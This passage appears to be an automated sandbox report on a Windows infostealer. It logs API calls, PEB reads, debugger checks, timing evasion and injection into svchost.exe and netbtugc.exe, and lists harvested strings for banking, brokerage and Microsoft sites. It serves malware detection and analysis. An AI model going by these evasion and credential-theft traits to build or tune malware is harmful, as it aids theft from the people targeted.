            Source: C:\Windows\SysWOW64\netbtugc.exe | API/Special instruction interceptor: Address: 7FF8C88ED544
            Source: C:\Windows\SysWOW64\netbtugc.exe | API/Special instruction interceptor: Address: 7FF8C88ED1E4
            Source: C:\Windows\SysWOW64\netbtugc.exe | API/Special instruction interceptor: Address: 7FF8C88F0154
            Source: C:\Windows\SysWOW64\netbtugc.exe | API/Special instruction interceptor: Address: 7FF8C88EDA44
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0357096E rdtsc
            Source: C:\Windows\SysWOW64\netbtugc.exe | Window / User API: threadDelayed 784
            Source: C:\Windows\SysWOW64\netbtugc.exe | Window / User API: threadDelayed 9188
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exe | API coverage: 3.5 %
            Source: C:\Windows\SysWOW64\svchost.exe | API coverage: 0.7 %
            Source: C:\Windows\SysWOW64\netbtugc.exe | API coverage: 2.6 %
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 3128 | Thread sleep count: 784 > 30
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 3128 | Thread sleep time: -1568000s >= -30000s
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 3128 | Thread sleep count: 9188 > 30
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 3128 | Thread sleep time: -18376000s >= -30000s
            Source: C:\Program Files (x86)\LvhEbETazCBsAXYgpzmmArtzDIFXiCzxNPhWTlVPRyABqIEvBJSsLtuBThsSsqkoBK\gaJjobDqjDYWsfRWPZSKY.exe TID: 5268 | Thread sleep time: -85000s >= -30000s
            Source: C:\Program Files (x86)\LvhEbETazCBsAXYgpzmmArtzDIFXiCzxNPhWTlVPRyABqIEvBJSsLtuBThsSsqkoBK\gaJjobDqjDYWsfRWPZSKY.exe TID: 5268 | Thread sleep count: 41 > 30
            Source: C:\Program Files (x86)\LvhEbETazCBsAXYgpzmmArtzDIFXiCzxNPhWTlVPRyABqIEvBJSsLtuBThsSsqkoBK\gaJjobDqjDYWsfRWPZSKY.exe TID: 5268 | Thread sleep time: -41000s >= -30000s
            Source: C:\Windows\SysWOW64\netbtugc.exe | Last function: Thread delayed
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exe | Code function: 0_2_00C4C2A2 FindFirstFileExW
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exe | Code function: 0_2_00C868EE FindFirstFileW,FindClose
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exe | Code function: 0_2_00C8698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exe | Code function: 0_2_00C7D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exe | Code function: 0_2_00C7D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exe | Code function: 0_2_00C89642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exe | Code function: 0_2_00C8979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exe | Code function: 0_2_00C7DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exe | Code function: 0_2_00C89B2B FindFirstFileW,Sleep,FindNextFileW,FindClose
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exe | Code function: 0_2_00C85C97 FindFirstFileW,FindNextFileW,FindClose
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_0281BAB0 FindFirstFileW,FindNextFileW,FindClose
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exe | Code function: 0_2_00C142DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo
            Source: F56GKLK7U4.4.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
            Source: F56GKLK7U4.4.dr | Binary or memory string: discord.comVMware20,11696428655f
            Source: F56GKLK7U4.4.dr | Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
            Source: F56GKLK7U4.4.dr | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
            Source: F56GKLK7U4.4.dr | Binary or memory string: global block list test formVMware20,11696428655
            Source: F56GKLK7U4.4.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
            Source: F56GKLK7U4.4.dr | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
            Source: F56GKLK7U4.4.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
            Source: F56GKLK7U4.4.dr | Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
            Source: F56GKLK7U4.4.dr | Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
            Source: F56GKLK7U4.4.dr | Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
            Source: F56GKLK7U4.4.dr | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
            Source: F56GKLK7U4.4.dr | Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
            Source: F56GKLK7U4.4.dr | Binary or memory string: outlook.office365.comVMware20,11696428655t
            Source: F56GKLK7U4.4.dr | Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
            Source: firefox.exe, 00000007.00000002.2477684921.00000275F5B1C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: F56GKLK7U4.4.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
            Source: F56GKLK7U4.4.dr | Binary or memory string: outlook.office.comVMware20,11696428655s
            Source: F56GKLK7U4.4.dr | Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
            Source: F56GKLK7U4.4.dr | Binary or memory string: ms.portal.azure.comVMware20,11696428655
            Source: F56GKLK7U4.4.dr | Binary or memory string: AMC password management pageVMware20,11696428655
            Source: gaJjobDqjDYWsfRWPZSKY.exe, 00000006.00000002.4506940651.0000000000D4F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll9
            Source: F56GKLK7U4.4.dr | Binary or memory string: tasks.office.comVMware20,11696428655o
            Source: F56GKLK7U4.4.dr | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
            Source: F56GKLK7U4.4.dr | Binary or memory string: turbotax.intuit.comVMware20,11696428655t
            Source: F56GKLK7U4.4.dr | Binary or memory string: interactivebrokers.comVMware20,11696428655
            Source: netbtugc.exe, 00000004.00000002.4506373948.000000000289E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlln
            Source: F56GKLK7U4.4.dr | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
            Source: F56GKLK7U4.4.dr | Binary or memory string: dev.azure.comVMware20,11696428655j
            Source: F56GKLK7U4.4.dr | Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
            Source: F56GKLK7U4.4.dr | Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
            Source: F56GKLK7U4.4.dr | Binary or memory string: bankofamerica.comVMware20,11696428655x
            Source: F56GKLK7U4.4.dr | Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
            Source: F56GKLK7U4.4.dr | Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
            Source: C:\Windows\SysWOW64\svchost.exe | Process information queried: ProcessInformation
            Source: C:\Windows\SysWOW64\svchost.exe | Process queried: DebugPort
            Source: C:\Windows\SysWOW64\netbtugc.exe | Process queried: DebugPort
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0357096E rdtsc
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00417823 LdrLoadDll
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exe | Code function: 0_2_00C8EAA2 BlockInput
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exe | Code function: 0_2_00C42622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exe | Code function: 0_2_00C142DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exe | Code function: 0_2_00C34CE8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exe | Code function: 0_2_014E2DF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exe | Code function: 0_2_014E2D90 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\BP-50C26_20241220_082241.exe | Code function: 0_2_014E1780 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035B035C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035B035C mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035FA352 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035D8350 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035D437C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0360634F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0352C310 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03608324 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03608324 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03550310 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0356A30B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035DE3DB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035DE3DB mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035D43D4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035EC3CD mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0353A3C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035383C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035B63C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0354E3F0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035663FF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035403E9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03528397 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0352E388 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0355438F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0352A250 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03536259 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035EA250 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035B8243 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035B8243 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035E0274 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03534260 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0352826B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0360625D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0352823B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0353A2C3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035402E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036062D6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0356E284 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035B0283 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035402A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035C62A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035C62A0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0352C156 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035C8158 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03604164 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03536154 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035C4144 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035C4144 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035DA118 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035DA118 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035F0115 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035DE10E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035DE10E mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03560124 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036061E5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035AE1D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035AE1D0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035F61C3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035601F8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035B019F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0352A197 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03570185 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035EC188 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035D4180 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03532050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035B6050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0355C073 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0354E016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035B4000 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035D2000 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035C6030 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0352A020 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0352C020 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035B20DE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0352C0F0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035720F0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0352A0E3 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035380E9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035B60E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0353208A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035F60B8 mov eax, dword ptr fs:[00000030h]2_2_035F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035F60B8 mov ecx, dword ptr fs:[00000030h]2_2_035F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035280A0 mov eax, dword ptr fs:[00000030h]2_2_035280A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035C80A8 mov eax, dword ptr fs:[00000030h]2_2_035C80A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03530750 mov eax, dword ptr fs:[00000030h]2_2_03530750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035BE75D mov eax, dword ptr fs:[00000030h]2_2_035BE75D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572750 mov eax, dword ptr fs:[00000030h]2_2_03572750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572750 mov eax, dword ptr fs:[00000030h]2_2_03572750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B4755 mov eax, dword ptr fs:[00000030h]2_2_035B4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356674D mov esi, dword ptr fs:[00000030h]2_2_0356674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356674D mov eax, dword ptr fs:[00000030h]2_2_0356674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356674D mov eax, dword ptr fs:[00000030h]2_2_0356674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03538770 mov eax, dword ptr fs:[00000030h]2_2_03538770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03540770 mov eax, dword ptr fs:[00000030h]2_2_03540770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03540770 mov eax, dword ptr fs:[00000030h]2_2_03540770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03540770 mov eax, dword ptr fs:[00000030h]2_2_03540770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03540770 mov eax, dword ptr fs:[00000030h]2_2_03540770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03540770 mov eax, dword ptr fs:[00000030h]2_2_03540770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03540770 mov eax, dword ptr fs:[00000030h]2_2_03540770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03540770 mov eax, dword ptr fs:[00000030h]2_2_03540770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03540770 mov eax, dword ptr fs:[00000030h]2_2_03540770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03540770 mov eax, dword ptr fs:[00000030h]2_2_03540770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03540770 mov eax, dword ptr fs:[00000030h]2_2_03540770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03540770 mov eax, dword ptr fs:[00000030h]2_2_03540770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03540770 mov eax, dword ptr fs:[00000030h]2_2_03540770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03530710 mov eax, dword ptr fs:[00000030h]2_2_03530710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03560710 mov eax, dword ptr fs:[00000030h]2_2_03560710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356C700 mov eax, dword ptr fs:[00000030h]2_2_0356C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356273C mov eax, dword ptr fs:[00000030h]2_2_0356273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356273C mov ecx, dword ptr fs:[00000030h]2_2_0356273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356273C mov eax, dword ptr fs:[00000030h]2_2_0356273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035AC730 mov eax, dword ptr fs:[00000030h]2_2_035AC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356C720 mov eax, dword ptr fs:[00000030h]2_2_0356C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356C720 mov eax, dword ptr fs:[00000030h]2_2_0356C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353C7C0 mov eax, dword ptr fs:[00000030h]2_2_0353C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B07C3 mov eax, dword ptr fs:[00000030h]2_2_035B07C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035347FB mov eax, dword ptr fs:[00000030h]2_2_035347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035347FB mov eax, dword ptr fs:[00000030h]2_2_035347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035527ED mov eax, dword ptr fs:[00000030h]2_2_035527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035527ED mov eax, dword ptr fs:[00000030h]2_2_035527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035527ED mov eax, dword ptr fs:[00000030h]2_2_035527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035BE7E1 mov eax, dword ptr fs:[00000030h]2_2_035BE7E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035D678E mov eax, dword ptr fs:[00000030h]2_2_035D678E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035307AF mov eax, dword ptr fs:[00000030h]2_2_035307AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035E47A0 mov eax, dword ptr fs:[00000030h]2_2_035E47A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0354C640 mov eax, dword ptr fs:[00000030h]2_2_0354C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03562674 mov eax, dword ptr fs:[00000030h]2_2_03562674
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035F866E mov eax, dword ptr fs:[00000030h]2_2_035F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035F866E mov eax, dword ptr fs:[00000030h]2_2_035F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356A660 mov eax, dword ptr fs:[00000030h]2_2_0356A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356A660 mov eax, dword ptr fs:[00000030h]2_2_0356A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572619 mov eax, dword ptr fs:[00000030h]2_2_03572619
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035AE609 mov eax, dword ptr fs:[00000030h]2_2_035AE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0354260B mov eax, dword ptr fs:[00000030h]2_2_0354260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0354260B mov eax, dword ptr fs:[00000030h]2_2_0354260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0354260B mov eax, dword ptr fs:[00000030h]2_2_0354260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0354260B mov eax, dword ptr fs:[00000030h]2_2_0354260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0354260B mov eax, dword ptr fs:[00000030h]2_2_0354260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0354260B mov eax, dword ptr fs:[00000030h]2_2_0354260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0354260B mov eax, dword ptr fs:[00000030h]2_2_0354260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0354E627 mov eax, dword ptr fs:[00000030h]2_2_0354E627
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03566620 mov eax, dword ptr fs:[00000030h]2_2_03566620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03568620 mov eax, dword ptr fs:[00000030h]2_2_03568620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353262C mov eax, dword ptr fs:[00000030h]2_2_0353262C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356A6C7 mov ebx, dword ptr fs:[00000030h]2_2_0356A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356A6C7 mov eax, dword ptr fs:[00000030h]2_2_0356A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035AE6F2 mov eax, dword ptr fs:[00000030h]2_2_035AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035AE6F2 mov eax, dword ptr fs:[00000030h]2_2_035AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035AE6F2 mov eax, dword ptr fs:[00000030h]2_2_035AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035AE6F2 mov eax, dword ptr fs:[00000030h]2_2_035AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B06F1 mov eax, dword ptr fs:[00000030h]2_2_035B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B06F1 mov eax, dword ptr fs:[00000030h]2_2_035B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03534690 mov eax, dword ptr fs:[00000030h]2_2_03534690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03534690 mov eax, dword ptr fs:[00000030h]2_2_03534690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035666B0 mov eax, dword ptr fs:[00000030h]2_2_035666B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356C6A6 mov eax, dword ptr fs:[00000030h]2_2_0356C6A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03538550 mov eax, dword ptr fs:[00000030h]2_2_03538550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03538550 mov eax, dword ptr fs:[00000030h]2_2_03538550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356656A mov eax, dword ptr fs:[00000030h]2_2_0356656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356656A mov eax, dword ptr fs:[00000030h]2_2_0356656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356656A mov eax, dword ptr fs:[00000030h]2_2_0356656A
